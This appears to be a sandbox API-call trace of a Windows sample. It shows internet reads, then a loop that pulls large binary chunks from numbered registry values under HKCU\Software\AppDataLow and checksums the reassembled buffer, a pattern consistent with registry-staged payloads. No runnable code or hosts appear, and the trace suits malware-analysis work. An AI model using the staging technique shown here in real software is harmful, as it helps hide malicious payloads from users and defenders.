	[0110.695] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000005, lpBuffer=0x258fcac, lpdwBufferLength=0x258fb60, lpdwIndex=0x0 | out: lpBuffer=0x258fcac*, lpdwBufferLength=0x258fb60*=0x4, lpdwIndex=0x0) returned 1
	[0110.695] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x258f92c, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x258fca0 | out: lpBuffer=0x258f92c*, lpdwNumberOfBytesRead=0x258fca0*=0x4) returned 1
	[0110.695] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x258f92c, dwNumberOfBytesToRead=0x200, lpdwNumberOfBytesRead=0x258fca0 | out: lpBuffer=0x258f92c*, lpdwNumberOfBytesRead=0x258fca0*=0x0) returned 1
	[0110.695] InternetCloseHandle (hInternet=0xcc000c) returned 1
	[0110.695] InternetCloseHandle (hInternet=0xcc0008) returned 1
	[0110.695] InternetCloseHandle (hInternet=0xcc0004) returned 1
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.696] GetLastError () returned 0x0
	[0110.697] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0110.708] GetProcAddress (hModule=0x77960000, lpProcName="RtlComputeCrc32") returned 0x77a2d9b0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.708] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] GetLastError () returned 0x0
	[0110.709] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fcb8, lpdwDisposition=0x0 | out: phkResult=0x258fcb8*=0xa2c, lpdwDisposition=0x0) returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.782] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] GetLastError () returned 0x0
	[0110.783] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_0") returned 10
	[0110.783] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa30, lpdwDisposition=0x0) returned 0x0
	[0110.783] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0110.793] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_0", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0110.813] RegCloseKey (hKey=0xa30) returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.915] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] GetLastError () returned 0x0
	[0110.916] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_1") returned 10
	[0110.916] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa30, lpdwDisposition=0x0) returned 0x0
	[0110.916] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0110.931] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_1", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0110.951] RegCloseKey (hKey=0xa30) returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] GetLastError () returned 0x0
	[0110.974] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_2") returned 10
	[0110.974] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa30, lpdwDisposition=0x0) returned 0x0
	[0110.974] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0110.990] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_2", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.009] RegCloseKey (hKey=0xa30) returned 0x0
	[0111.039] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_3") returned 10
	[0111.039] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa30, lpdwDisposition=0x0) returned 0x0
	[0111.039] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.081] RegQueryValueExW (in: hKey=0xa30, lpValueName="gpscsdch_3", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.189] RegCloseKey (hKey=0xa30) returned 0x0
	[0111.249] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_4") returned 10
	[0111.249] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa38, lpdwDisposition=0x0) returned 0x0
	[0111.249] RegQueryValueExW (in: hKey=0xa38, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.260] RegQueryValueExW (in: hKey=0xa38, lpValueName="gpscsdch_4", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.281] RegCloseKey (hKey=0xa38) returned 0x0
	[0111.336] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_5") returned 10
	[0111.336] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa38, lpdwDisposition=0x0) returned 0x0
	[0111.336] RegQueryValueExW (in: hKey=0xa38, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.370] RegQueryValueExW (in: hKey=0xa38, lpValueName="gpscsdch_5", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.385] RegCloseKey (hKey=0xa38) returned 0x0
	[0111.449] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_6") returned 10
	[0111.449] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa34, lpdwDisposition=0x0) returned 0x0
	[0111.449] RegQueryValueExW (in: hKey=0xa34, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.458] RegQueryValueExW (in: hKey=0xa34, lpValueName="gpscsdch_6", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x7d000 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x7d000) returned 0x0
	[0111.581] RegCloseKey (hKey=0xa34) returned 0x0
	[0111.678] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_7") returned 10
	[0111.678] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa34, lpdwDisposition=0x0) returned 0x0
	[0111.678] RegQueryValueExW (in: hKey=0xa34, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x3, lpData=0x0, lpcbData=0x258fc8c*=0x55832) returned 0x0
	[0111.684] RegQueryValueExW (in: hKey=0xa34, lpValueName="gpscsdch_7", lpReserved=0x0, lpType=0x258fc80, lpData=0x2750008, lpcbData=0x258fc8c*=0x55832 | out: lpType=0x258fc80*=0x3, lpData=0x2750008*, lpcbData=0x258fc8c*=0x55832) returned 0x0
	[0111.704] RegCloseKey (hKey=0xa34) returned 0x0
	[0111.881] wsprintfW (in: param_1=0x258fcdc, param_2="%s_%d" | out: param_1="gpscsdch_8") returned 10
	[0111.881] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\AppDataLow", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20219, lpSecurityAttributes=0x0, phkResult=0x258fc8c, lpdwDisposition=0x0 | out: phkResult=0x258fc8c*=0xa34, lpdwDisposition=0x0) returned 0x0
	[0111.881] RegQueryValueExW (in: hKey=0xa34, lpValueName="gpscsdch_8", lpReserved=0x0, lpType=0x258fc80, lpData=0x0, lpcbData=0x258fc8c*=0x0 | out: lpType=0x258fc80*=0x0, lpData=0x0, lpcbData=0x258fc8c*=0x0) returned 0x2
	[0111.881] RegCloseKey (hKey=0xa34) returned 0x0
	[0111.882] RegCloseKey (hKey=0xa2c) returned 0x0
	[0111.882] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x6f7d020, Length=0x3c0832) returned 0xd0a8230d

Thread:
	id = 112
	os_tid = 0xdf8


Thread:
	id = 113
	os_tid = 0x93c


Thread:
	id = 114
	os_tid = 0xc38


Thread:
	id = 115
	os_tid = 0x494

	[0096.447] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xffffffff, lpConsoleScreenBufferInfo=0x2d0fc80 | out: lpConsoleScreenBufferInfo=0x2d0fc80) returned 0

Thread:
	id = 116
	os_tid = 0xc08


Thread:
	id = 117
	os_tid = 0xeac


Thread:
	id = 118
	os_tid = 0xefc


Thread:
	id = 119
	os_tid = 0xee8


Thread:
	id = 124
	os_tid = 0xf80

	[0098.684] GetCurrentThreadId () returned 0xf80
	[0098.684] GetCurrentPackageId () returned 0x3d54
	[0098.684] GetLastError () returned 0x0
	[0098.685] SetLastError (dwErrCode=0x0) 
	[0098.685] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0099.530] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818203600000) returned 1
	[0099.530] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818203700000) returned 1
	[0099.530] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0100.544] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818305000000) returned 1
	[0100.544] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818305100000) returned 1
	[0100.545] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0100.563] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818307000000) returned 1
	[0100.564] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818307000000) returned 1
	[0100.564] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0100.564] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818307100000) returned 1
	[0100.565] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818307200000) returned 1
	[0100.565] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.245] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818375200000) returned 1
	[0101.246] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818375200000) returned 1
	[0101.246] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.246] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818375300000) returned 1
	[0101.246] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818375300000) returned 1
	[0101.247] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.247] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818375300000) returned 1
	[0101.247] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818375400000) returned 1
	[0101.247] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.302] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818380900000) returned 1
	[0101.303] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818380900000) returned 1
	[0101.303] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.303] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818381000000) returned 1
	[0101.304] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818381100000) returned 1
	[0101.304] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.306] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818381300000) returned 1
	[0101.307] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818381300000) returned 1
	[0101.307] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.326] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818383300000) returned 1
	[0101.327] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818383400000) returned 1
	[0101.327] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.381] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818388700000) returned 1
	[0101.381] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818388800000) returned 1
	[0101.381] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.382] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818388900000) returned 1
	[0101.382] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe80 | out: lpPerformanceCount=0x475fe80*=1818388900000) returned 1
	[0101.382] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.579] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818408600000) returned 1
	[0101.580] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.580] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818408700000) returned 1
	[0101.580] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.585] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818409100000) returned 1
	[0101.585] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.587] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818409400000) returned 1
	[0101.587] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.590] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818409700000) returned 1
	[0101.592] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.600] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818410600000) returned 1
	[0101.601] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.642] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818414900000) returned 1
	[0101.643] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.669] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818417600000) returned 1
	[0101.670] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.670] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818417700000) returned 1
	[0101.670] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.672] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818417900000) returned 1
	[0101.672] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.672] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818417900000) returned 1
	[0101.672] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.673] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818418000000) returned 1
	[0101.673] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.735] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818424200000) returned 1
	[0101.735] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.737] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818424400000) returned 1
	[0101.738] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.753] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426000000) returned 1
	[0101.753] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.754] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426100000) returned 1
	[0101.754] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.755] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426200000) returned 1
	[0101.755] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.756] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426300000) returned 1
	[0101.756] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
	[0101.756] QueryPerformanceCounter (in: lpPerformanceCount=0x475fe84 | out: lpPerformanceCount=0x475fe84*=1818426300000) returned 1
	[0101.757] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0xffffffff) returned 0x0
